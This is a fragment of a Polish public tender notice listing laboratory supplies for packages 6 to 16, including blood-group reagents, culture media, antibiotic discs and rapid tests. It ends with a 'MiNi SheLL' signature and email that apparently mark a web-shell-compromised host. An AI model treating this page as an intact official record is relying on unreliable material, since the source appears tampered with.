<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Odczynniki do badań serologicznych krwi wraz z dzierżawą aparatury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	Szacunkowa ilość oznaczeń   
1.	2.	3.
1.	karty do grupy krwi noworodka (A-B-D VIv (-)-kontrola - BTA)	310
2.	karty do badania grupy drugim klonem A-B-D (VI+) odczynnik anty-D wykrywa odmianę DVI	310
3.	Surowica do potwierdzania wyników słabych odmian antygenu RhD w mikrometodzie kolumnowej	50
4.	Badania przeglądowe przeciwciał w teście PTA-LISS (przy grupach krwi osób dorosłych oraz biorców) 	4237
5.	Właściwa próba zgodności w teście PTA-LISS (liczba donacji)	1728
7.	Krwinki wzorcowe do testu PTA-LISS zawieszone w LISS,maksymalne opakowanie jednostkowe - 3x10ml	4237
8.	Oznaczenie fenotypu w zakresie C-c-Cw-E-e-K kontrola na jednej karcie	48
9.	Diluent do krwinek używany w mikrometodzie żelowej o trwałości po otwarciu minimum 6 miesięcy	wg wskazań producenta
10.	Diluent do krwinek używany przy oznaczeniu antygenu Cw lub pełnego fenotypu jeżeli tego wymaga metoda	wg wskazań producenta
11.	Końcówki do pipetora automatycznego	9000
12.	Wewnątrzlaboratoryjna codzienna kontrola jakości dla testów kolumnowych i klasycznych	12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Testy paskowe do identyfikacji drobnoustrojów wraz z dzierżawą aparatury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	zestaw bezodczynnikowy do identyfikacji szczepów bakterii jelitowych z rodz. Enterobacteriacae za pomoca 24 cech biochemicznych stanowiacych 1 panel diagnostyczny w czasie 24 godz.	szt.	320
2.	zestaw do identyfikacji szczepów bakterii jelitowych z rodz. Enterobacteriacae w oparciu o 24 cechy biochemiczne stanowiace 1 panel diagnostyczny w czasie do 5 godz.	szt.	40
3.	zestaw bezodczynnikowy do identyfikacji paciorkowców za pomoca 24 cech biochemicznych stanowiacych 1 panel diagnostyczny w czasie 24 godz.	szt.	80
4.	nośnik zawiesiny do identyfikacji paciorkowców (w niezbędnej ilości do wykonania w/w testów)	szt.	80
5.	zestaw bezodczynnikowy do identyfikacji gronkowców za pomoca 24 cech biochemicznych stanowiacych 1 panel diagnostyczny w czasie 24 godz.	szt.	80
6.	zestaw bezodczynnikowy do identyfikacji bakterii niefermentujacych za pomoca 24 cech biochemicznych stanowiacy 1 panel diagnostyczny w czasie 24 godz.	szt.	80
7.	zestaw bezodczynnikowy do identyfikacji grzybów drozdzopodobnych za pomoca 21 cech biochemicznych stanowiących 1 panel diagnostyczny	szt.	20
8.	zestaw bezodczynnikowy do identyfikacji bakterii z rodziny Neisseria za pomoca 7 cech biochemicznych stanowiących 1 panel diagnostyczny w czasie do 24 godz.	szt.	36
9.	nośnik zawiesiny  do identyfikacji bakterii z bakterii z rodziny Neisseria (w niezbędnej ilości do wykonania w/w testów0	szt.	36
10.	zestaw do identyfikacji bakterii beztlenowych za pomocą 23 cech biochemicznych stanowiących 1 panel diagnostyczny w czasie 24 godz- 48 godz.	szt.	40
11.	nośnik zawiesiny do identyfikacji bakterii beztlenowych ( w niezbędnej ilości do wykonania w/w testów)	szt.	30
12.	Szybki test paskowy do wykrywania zdolności szczepów bakteryjnych do hydrolizy hipuranu sodu wraz z odczynnikiem	ozn.	50
13.	Test do szybkiej detekcji produkcji acetoiny wraz z odzcynnikiem	ozn.	100
14.	szybki test paskowy do wykrywania aktywności bakteryjnej betalaktamazy dla organizmów rodzaju Staphylococcus, Neisseria, Haemophilus	ozn	50
15.	Test do szybkiego wykrywania aktywności esterazy octanowej bakterii Moraxella catarrhalis	ozn.	50
16.	Szybki test paskowy do testu PYR wraz z odczynnikiem	ozn.	100
17.	odczynnik do testu indol	ozn.	200
18.	odczynnik do testu Fenyloalanina	ozn.	200
19.	odczynnik do testu Fosfataza	ozn.	200
20.	Odczynnik do testu Azotany	ozn	200
21.	Szybki test przeznaczony do oznaczania reaklcji indolowej jako degradacyjnego produktu bakteryjnego metabolizmu tryptofanu	ozn.	840
22.	olej parafinowy	szt.	4
23.	test do szybkiego róznicowania fermentatywnego i oksydatywnego  metabolizmu glukozy	ozn.	200
24.	Szybki test paskowy do testu ONP	ozn.	50
25.	końcówki do pipety automatycznej	szt.	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Płytki gotowe, testy lateksowe, odczynniki wraz z dzierżawą urządzenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Columbia Agar+ 5% krew barania	szt.	5200
2.	Columbia Agar+5% krew   CNA  wybiórcze dla  Staph/ Strept	szt.	250
3.	Mueller Hinton 2 Agar	szt.	4200
4.	Saboraud Agar + Gentamicyna + Chloramfenikol	szt.	500
5.	Agar wybiórczy dla Enterococcus z  eskuliną	szt.	400
6.	Agar MacConkey z fioletem krystalicznym	szt.	2000
7.	Agar wybiórczy z dla Pseudomonas z cetrimidem	szt.	60
8.	Agar czekoladowy wybiórczy dla Haemophilus z  bacytracyną	szt.	400
9.	Agar czekoladowy z antybiotykiem dla Neisseria meningitidis i Neisseria gonorrhoeae	szt.	40
10.	Agar selektywny dla Gardnerella vaginalis	szt.	350
11.	Agar Schaedlera + 5% krew barania 	szt.	300
12.	Agar Schaedlera + 5% krew barania z antybiotykami Neomycyną i Vankomycyną	szt.	50
13.	Agar selektywny dla Salmonella/Shigella	szt.	450
14.	Bulion TSB w probówkach	szt.	700
15.	Bulion Schaedlera z vit K w probówkach	szt.	50
16.	Liofilizowane podłoże do hodowli Trichomonas vaginalis	szt.	24
17.	Szybki test lateksowy do wykrywania grypy serolog A u paciork.( 50 oznaczeń)	op.	5
18.	Szybki test lateksowy do wykrywania grupy serolog B u paciork (50 oznaczeń)	op.	5
19.	Szybki test lateksowy do wykrywania grupy serolog C u paciork. (50 oznaczeń)	op.	1
20.	Szybki test lateksowy do idententyfikacjiantyg. Bakteryjnych w PMR  (nie więcej niż 30 oznacz.)	op.	1
21.	Test lateksowy suchy-lateks opłaszczony na kartonie reakcyjnym do identyfikacji Staphylococcus aureus (wykrywający koagulazę,białko A, polisacharydy MRSA)	oznaczeń	500
22.	Płytki odciskowe do mikrobiologicznej czystości powierzchni płaskich i powietrza  /25 cm2 powierzchni/	szt.	50
23.	Podłoże płynne namnażajace w butelkach do hodowli drobnoustrojow z krwi w war. tlenowych i beztlenowych z indykatorem wzrostu  /metoda manualna/	szt.	600
24.	Probówki z kwaśnym seleninem sodu (gotowe podłoże w probówkach)	szt	1000
25.	Agar Mueller Hinton z 5 % krwią końska 20 mg/l NAD	szt. 	650
26.	Probówki z tioglikolanem sodu poj. 9 ml (do hodowli płynnej bakterii beztlenowych)	szt.	7
27.	Brucella Agar plus 5% krew końska	szt	10
27	Bulion Tryptozowo-Sojowy TSB w probówkach 5ml 	szt	500
28	Agar Hektoen 	szt	450
29.	Bulion Tood Hewitta z antybiotykiem w probówkach 5ml  	szt	20
29.	Dezoksycholan sodu  ampułki 2ml	szt.	2
30.	Roztwór EDTA  pH 7,3-7,4   0,5 Mol poj.2ml	szt.	2
31.	Kwas boronowy 300?g,poj 2ml	szt.	2
32.	Odczynniki do wykrywania katalazy (nie więcej niż 5 ml)	op.	2
33.	Zestaw odczynników do barwienia Gramem (4x 240 ml)	op.	16
34.	osocze królicze liofilizowane (nie więcej niż 5ml)	op.	23
35.	generator CO 2 (saszetki)	szt	400
36.	generator anaer z katalizatorem (saszetki)	szt	250
37.	genbag anaer + saszetki	szt	10
38.	Anaer indykator    	szt	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.12.41.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9- Odczynniki do aparatu Sysmex KX-21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Cellpack (20 l)	op.	17
2.	Stromatolyser WH 1,5 L (3 x 0,5 l)	op.	6
3.	Cellclean 1 x 50 ml	op.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 - Odczynniki serologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Odczynnik monoklonalny anty A klon I - fiolka 10 ml z zakraplaczem	amp.	44
2.	Odczynnik monoklonalny anty A klon II - fiolka 10 ml z zakraplaczem	amp.	28
3.	Odczynnik monoklonalny anty B klon I - 10 ml fiolka z zakraplaczem	amp.	44
4.	Odczynnik monoklonalny anty B klon II - fiolka 10 ml  z zakraplaczem	amp.	28
5.	Odczynnik monoklonalny anty D Blend - fiolka 10 ml z zakraplaczem	amp.	86
6.	Odczynnik monoklonalny anty D RUM - fiolka 10 ml z zakraplaczem	amp.	86
7.	Odczynnik monoklonalny antyglobulinowy poliwalentny płynny - fiolka 10 ml z zakraplaczem (tylko odczynnik - nie może być surowica)	amp.	3
8.	Standard anty D - 2ml	amp.	3
9.	LISS - L (płynny) - 100ml	szt.	1
10.	Krwinki wzorcowe do wykrywania przeciwciał - 3 x 4 ml - fiolka z zakraplaczem	zest.	1
11.	Dolichotest  5ml	amp.	1
12.	Krwinki słabouczulone - 10 ml fiolka z zakraplaczem	amp.	1
13.	Odczynnik monoklonalny anty-IgG - amp. 10 ml z zakraplaczem.	amp.	1
19.	Odczynnik monoklonalny anty-K - amp. 5 ml z zakraplaczem	amp.	1
20.	PEG (glikol poliwalentny) - amp. 10 ml z zakraplaczem	amp.	1
21.	PBS 500 ml	szt.	1
22.	Zestaw krwinek wzorcowych do badań układu AB0 3x10 ml z zakraplaczem	zestaw	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - Krążki antybiotykowe i diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Ampicylina     AM  10 ug	szt.	1100
2.	Ampicylina     AM  2 ug	szt.	350
3.	Ampicylina/sulbactam   SAM  10/10 ug	szt.	50
4.	Amoksycylina/kwas klawulanowy AMC 20/10	szt.	1000
5.	Amikacyna  AN  30	szt.	1300
6.	Aztreonam   ATM  30	szt.	100
7.	Azytromycyna  AZM  15	szt.	50
8.	Cefuroksym   CXM  30	szt.	1400
9.	Cefaklor    CEC  30	szt.	50
10.	Cefoksytyna  FOX  30	szt.	800
11.	Ceftazydyna  CAZ  30	szt.	400
12.	Cefazolina 30	szt.	50
13.	Cefoperazon   CFP  30	szt.	100
14.	Cefotaksym    CTX  30	szt.	200
15.	Ceftriakson   CRO 30	szt.	300
16.	Cefaleksyna    CL  30	szt.	400
17.	Cefepim  FEP  30	szt.	300
18.	Ceftarolina   5	szt.	100
19.	Ciporofloksacyna   CIP 5	szt.	1600
20.	Chloramfenikol   C  30	szt.	50
21.	Chinupristyna /dalfopristyna   SYN	szt.	100
22	Erytromycyna  E  15	szt.	800
23	Gentamycyna    Ge 10	szt.	1400
24	Imipenem    IPM 10	szt.	750
25	Klarytromycyna   CLR 15	szt.	50
26	Kwas Nalidyksowy   NA  30	szt.	50
27	Doripenem 10	szt.	50
28	Klindamycyna  CC 2	szt.	900
29	Mupirocyna     MUP  200	szt.	200
30	Norfloksacyna   NOR  10	szt.	200
31	Oxacylina  OX  1	szt.	100
32	Kloksacylina	szt.	50
33	Ofloksacyna   OFX 5	szt.	50
34	Penicylina P  10 IU	szt.	50
35	Streptomycyna  S 300	szt.	100
36	Trimetoprim   TMP 5	szt.	50
37	Trimetoprim/Sulfamethoksazol   SXT	szt.	2000
38	Tetracyklina   TE   30	szt.	300
39	Teikoplanina   TEC   30	szt.	500
40	Tobramycyna  NN  10	szt.	1200
41	Tikarcylina TIC 75	szt.	100
42	Tikarcylina/kw.klawulanowy   TIM 75/10	szt.	200
43	Temocylina  30 	szt.	200
44	Amoksycylina/kwas klawulanowy   AMC 2/1	szt.	300
45	Moksifloksacyna   MFX 5	szt.	300
46	Meropenem MEM  10	szt.	900
47	Ertapenem ETP 10	szt.	600
48	Lewofloksacyna   LVX 5	szt.	1050
49	Rifampicyna  RF 5	szt.	50
50	Fosfomycyna trometamol FOT 200	szt.	100
51	Tigecyklina   TGC 15 ug	szt.	200
52	Krążki z optochiną	szt.	300
53	Krążki z czynnikiem X	szt.	200
54	Krążki z czynnikiem V	szt.	150
55	Krazki z Bacytracyną  do identyfikacji Strep. pyogenes	szt.	400
56	Krążki do ident. Moraxella catarrhalis	szt.	100
57	Krazki z Nowobiocyną	szt.	100
58	Krążki z Furazolidonem	szt.	50
59	Test cefinazowy  w krążkach	szt.	150
60	Krążki do identyfikacji Enterococcus faecalis	szt.	250
61	Test na oxydazę  /krążki lub paski /	szt.	200
62	Krązki do identyfikacji Gardnerella vaginalis	szt.	100
63	Kwas Fusydowy 10 ?g	szt.	250
64	Kanamycyna 30 ?g	szt.	50
65	Piperacylina 30	szt.	500
66	Piperacylina/Tazobactam 30/6	szt.	350
67	Cefotaksym 5	szt.	800
68	Ceftazydym 10	szt.	600
69	Netilmycyna 10	szt.	800
70	Nitrofurantina 100	szt.	400
71	Penicylina Benzylowa (Penicylina G) 1UI	szt.	600
72	Linezolid 10	szt.	200
73	Gentamicyna 30	szt.	100
74	Wankomycyna 5	szt.	200
75	Fenoksymetylpenicylina (Penicylina V) 10	szt.	50
76	Pefloksacyna  PEF 5	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - Płytki gotowe chromogenne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Agar MRSA  z Cefoksytyną 	szt.	280
2.	Agar do identyfikacji Staphylococcus  aureus	szt.	112
3.	Agar do identyfikacji  Streptococcus agalactiae gr B	szt.	580
4.	Agar do izolacji drobnoustrojów z moczu	szt.	1320
5.	Agar do wstępnej identyfikacji grzybów z rodzaju Candida /4 gatunki/ 	szt.	100
6.	Agar do wykrywania pałeczek G ujemnych  z mechanizmem ESBL	szt.	340
7.	Agar do identyfikacji Salmonella 	szt.	21
8.	Agar do identyfikacji Clostridium difficile	szt.	14
9.	Agar do wykrywania Enterococcus VRE	szt.	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 - Testy  immunoenzymatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Test immunoenzymatyczny (kasetkowy)pakowany pojedynczo do wykrywania równoczesnego antygenu GDH oraz toksyny A i B Clostridium difficile w próbkach kału . Dozowanie próbki do jednej studzienki. Kontrola dodatnia w zestawie. Wykrywalnosc toksysny a nie gorsza niz 0,7 ng/ml, toksyny B nie gorsza niż 0,2 ng/ml, GDH nie gorsza niz 0,8 ng/ml. Test z mozliwościa przechowywania próbki do badania bez potrzeby zamrażania do 72 h. Termin ważności testu nie moze być krótszy niż 18 m-cy. Wszystkie wymagane parametry  testu musza być potwierdzone w załaczonej do testu metodyce (w j. polskim)	szt.	75.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 - Testy  immunochromatograficzne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	Test immunochromatograficzny kasetkowy do wykrywania antygenu Rota  i Adenowirusa w kale (pakowany pojedynczo)                 	szt.	240
2.	Test immunochromatograficzny do wykrywania antygenu wisusa RSV w wymazch z nosa/nosogardzieli pakowany pojedynczo wraz z kontrolą dodatnią	szt.	160
	Kontrola RSV	op.	1
3.	Test immunochromatograficzny kasetkowy do wykrywania antygenu  Campylobacter w próbkach kału pakowany pojedynczo wraz z kontrola dodatnią i potrzebnymi akcesoriami	szt.	40
4.	Test immunochromatograficzny kasetkowy do wykrywania antygenu  Norovirusa w próbkach kału pakowany pojedynczo wraz z kontrola dodatnią i potrzebnymi akcesoriami	szt.	80
5.	Test immunochromatograficzny kasetkowy do wykrywania antygenu wirusa Influenza Ai B w wymazach z nosa/nosogardzieli pakowany pojedynczo wraz z potrzebnymi akcesoriami	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15 - System paskowy do ilościowego określania  MIC na paskach plastikowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość
1.	2.	3.	4.
1.	antybiotyki z gradientem stężeń na pasku plastikowym do określania MIC danego antybiotyku (Penicylina benzylowa PG 256, Amoksycylina/kw.klaw 256, Amikacyna     256, Gentamicyna 1024, Netylmicyna 256, Kolistyna 256, Klindamycyna   256, Tetracyklina 256, Erytromycyna 256, Vankomycyna  256, Teikoplanina 256, Cefotaksym 256, Ceftazydyna 256, Ceftriakson 256, Imipenem 32, Meropenem 32, Ciprofloksacyna  32, Ampicylina/sulbaktam 256, Chloramfenikol 256, Piperacylina/tazobaktam 256, Cefuroksym 256, Ampicylina 256, Cefotaksym  CT 32, Cefepim 256, Ertapenem 32, Gentamicyna  256, Mertonidazol 256, Tigecyklina 256, Trimethoprim/Sulfamethoksazol 32, Piperacylina 256, Ticarcylina/kw.klawulanowy 256, Cefoksytyna 256	szt.	150
2.	testy antybiotykowe na nośniku plastikowym do wykrywania mechanizmów oporności  MBL, ESBL,AmpC,GRD	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16 - Odczynniki laboratoryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis  przedmiotu zamówienia	J.m.	Ilość j.m.
1.	2.	3.	4.
1.	Odczynnik Rossiniego 100 ml	ml	100
2.	Mac-William 1000 ml	ml	1000
3.	May-Grunwald 1000 ml	ml	4000
4.	Barwnik Giemsy 1000 ml	ml	1000
5.	Odczynnik Ehrlicha 1000 ml	ml	1000
6.	Alkohol izopropylowy o wys. czystości (99,8%)  co czyszczenia obiektywu mikroskopów	ml	1000
7.	olejek imersyjny do mikroskopu o współ. Załamania 1,516 (dopuszczalne opakowania po 50 lub 100 ml)	ml	500
8.	Odczynnik TURKA 100 ml.	ml	100
9.	Odczynnik PANDego 100 ml	ml	100
10.	Odczynnik Samsona 100 ml	ml	100
11.	Odczynnik NONE-APELTA 100 ml.	ml	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com